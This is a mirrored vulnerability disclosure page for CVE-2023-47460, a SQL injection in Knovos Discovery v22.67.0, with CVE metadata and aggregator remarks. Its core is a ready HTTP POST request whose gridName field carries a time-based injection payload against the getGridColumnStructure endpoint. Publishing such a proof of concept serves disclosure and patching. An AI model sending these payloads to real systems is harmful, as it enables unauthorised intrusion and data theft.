CVE-2023-47460 PoC — Knovos Discovery 安全漏洞

Source

https://github.com/aleksey-vi/CVE-2023-47460

Associated Vulnerability

Title:Knovos Discovery 安全漏洞 (CVE-2023-47460)
Description:Knovos Discovery是Knovos公司的一个综合性法律发现平台。 Knovos Discovery v.22.67.0版本存在安全漏洞，该漏洞源于存在SQL注入漏洞，允许远程攻击者通过/DiscoveryProcess/Service/Admin.svc/getGridColumnStructure组件执行任意代码。

Readme

# CVE-2023-47460

## Description

SQL injection vulnerability in Knovos Discovery v.22.67.0 allows a remote attacker to execute arbitrary code via the /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure component

## Vulnerability Type

SQL Injection

## Vendor of Product

Knovos Discovery

## Affected Product Code Base

Version 22.67.0 - Version 22.67.0

## Affected Component

/DiscoveryProcess/Service/Admin.svc/getGridColumnStructure

## Attack Type

Remote

## Impact Code execution

true

## Impact Information Disclosure

true

## Discoverer

- Aleksey Vistorobskiy

## Attack Vectors

authorized user


Request:
```
POST /DiscoveryProcess/Service/Admin.svc/getGridColumnStructure?caseMappingId=*** HTTP/1.1
Host: vuln_host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 73
Connection: close

{
  "gridName":"Inventory-grid' waitfor delay'0:0:50'--",
  "uID":"10"
}

```

Response:
![](/1.jpg)

## Reference

- https://www.knovos.com/
- https://github.com/aleksey-vi/CVE-2023-47460

File Snapshot


 [4.0K]  /data/pocs/652b0e892ae22c0bf9cf9982b8fe6da5c6704ade
├── [ 50K]  1.jpg
└── [1.1K]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!